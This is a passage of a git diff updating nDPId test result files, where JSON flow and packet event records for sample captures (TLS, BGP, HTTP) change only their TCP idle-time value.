{"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-01143{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3113,"flow_avg_l4_payload_len":444,"midstream":0,"thread_ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1581109359601,"flow_last_seen":1581109360696,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17203,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1581109360696,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109359601,"flow_last_seen":1581109359601,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581109359601,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109359601,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581109359601,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7Fgs8nAbvmgoUNAAAAALAC\/\/+6MQAAAgQFtAEDAwUBAQgKHinouAAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581109359639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581109359639,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG7zyeqmyMX5oKFDqAS\/ogx6QAAAgQFrAQCCAolLqfYHinouAEDAwc="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581109359639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581109359639,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7Fgs8nAbvmgoUOqpsjGIAQECxO5AAAAQEICh4p6N4lLqfY"} +00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109359601,"flow_last_seen":1581109359641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1581109359641,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1673,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01143{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3113,"flow_avg_l4_payload_len":444,"midstream":0,"thread_ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1581109359601,"flow_last_seen":1581109360696,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17203,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1581109360696,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":41,"source":"443-safari.pcap","alias":"nDPId-test","packets-captured":41,"packets-processed":41,"total-skipped-flows":0,"total-l4-data-len":17203,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1581109360696} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 41/41 diff --git a/test/results/BGP_Cisco_hdlc_slarp.pcap.out b/test/results/BGP_Cisco_hdlc_slarp.pcap.out index 214a2abc4..d82f132e1 100644 --- a/test/results/BGP_Cisco_hdlc_slarp.pcap.out +++ b/test/results/BGP_Cisco_hdlc_slarp.pcap.out 
@@ -1,11 +1,11 @@ 00471{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1445156939131} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1445156939131,"flow_last_seen":1445156939131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1445156939131,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","flow_datalink":9,"flow_max_packets":3} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1445156939131,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":48,"pkt_l4_len":24,"thread_ts_msec":1445156939131,"pkt":"DwAIAEXAACz4kkAAAQa2VmQQAQJkEAEBR5QAs7zqddEAAAAAYAJAABMAAAACBAW0"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1445156939145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":48,"pkt_l4_len":24,"thread_ts_msec":1445156939145,"pkt":"DwAIAEXAACyvfwAAAQY\/amQQAQFkEAECALNHlBlZ03+86nXSYBJAACYWAAACBAW0"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1445156939152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":44,"pkt_l4_len":20,"thread_ts_msec":1445156939152,"pkt":"DwAIAEXAACj4k0AAAQa2WWQQAQJkEAEBR5QAs7zqddIZWdOAUBBAAD3TAAA="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1445156939131,"flow_last_seen":1445156939152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1445156939152,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1445156939131,"flow_last_seen":1445156989230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1445156989230,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","flow_datalink":9,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1445156939131,"flow_last_seen":1445156939131,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1445156939131,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","flow_datalink":9,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1445156939131,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":48,"pkt_l4_len":24,"thread_ts_msec":1445156939131,"pkt":"DwAIAEXAACz4kkAAAQa2VmQQAQJkEAEBR5QAs7zqddEAAAAAYAJAABMAAAACBAW0"} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1445156939145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":48,"pkt_l4_len":24,"thread_ts_msec":1445156939145,"pkt":"DwAIAEXAACyvfwAAAQY\/amQQAQFkEAECALNHlBlZ03+86nXSYBJAACYWAAACBAW0"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1445156939152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":44,"pkt_l4_len":20,"thread_ts_msec":1445156939152,"pkt":"DwAIAEXAACj4k0AAAQa2WWQQAQJkEAEBR5QAs7zqddIZWdOAUBBAAD3TAAA="} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1445156939131,"flow_last_seen":1445156939152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1445156939152,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1445156939131,"flow_last_seen":1445156989230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1445156989230,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","flow_datalink":9,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","packets-captured":14,"packets-processed":14,"total-skipped-flows":0,"total-l4-data-len":345,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1445156989230} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 14/14 diff --git a/test/results/BGP_redist.pcap.out b/test/results/BGP_redist.pcap.out index d149ebd67..686966d2b 100644 --- a/test/results/BGP_redist.pcap.out +++ b/test/results/BGP_redist.pcap.out 
@@ -2,10 +2,10 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"BGP_redist.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1256636836167} 00187{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":104,"packet_id":1,"source":"BGP_redist.pcap","alias":"nDPId-test","protocol":34887,"global_ts_msec":1256636836167} 00503{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"BGP_redist.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":163,"pkt_type":34887,"pkt_l3_offset":4,"pkt_l4_offset":0,"pkt_len":163,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"DwCIRwABLf5FwACbk8xAAP8G2sQCAgICBAQEBACz+C\/VqGxJPJL2UFAYP7QOoQAA\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/wBzAgAAAFxAAQECQAIAgAQEAAAAVkAFBAAAAGTAECAAAgBkAAAEVwAFAAAAAQIAgAAAAAAAAwCAAawQAgEAAIAOIQABgAwAAAAAAAAAAAICAgIAeAABkQAAAGQAAABkqgAAAA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3} 
-00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":159,"pkt_l4_len":135,"thread_ts_msec":1256636836167,"pkt":"DwAIAEXAAJv\/w0AA\/gZtywICAgIFBQUFALPBGWeqNFC\/WbBkUBg\/x6y+AAD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/AHMCAAAAXEABAQJAAgCABAQAAABWQAUEAAAAZMAQIAACAGQAAARXAAUAAAABAgCAAAAAAAADAIABrBACAQAAgA4hAAGADAAAAAAAAAAAAgICAgB4AAGRAAAAZAAAAGSqAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3} +00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1256636836167,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":159,"pkt_l4_len":135,"thread_ts_msec":1256636836167,"pkt":"DwAIAEXAAJv\/w0AA\/gZtywICAgIFBQUFALPBGWeqNFC\/WbBkUBg\/x6y+AAD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/AHMCAAAAXEABAQJAAgCABAQAAABWQAUEAAAAZMAQIAACAGQAAARXAAUAAAABAgCAAAAAAAADAIABrBACAQAAgA4hAAGADAAAAAAAAAAAAgICAgB4AAGRAAAAZAAAAGSqAAAA"} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} 
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":1,"total-skipped-flows":0,"total-l4-data-len":115,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1256636836167} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/1 diff --git a/test/results/EAQ.pcap.out b/test/results/EAQ.pcap.out index e69a44cc7..107de09ca 100644 --- a/test/results/EAQ.pcap.out +++ b/test/results/EAQ.pcap.out 
@@ -1,15 +1,15 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"EAQ.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"EAQ.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1432820948562} -00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820948562,"flow_last_seen":1432820948562,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820948562,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
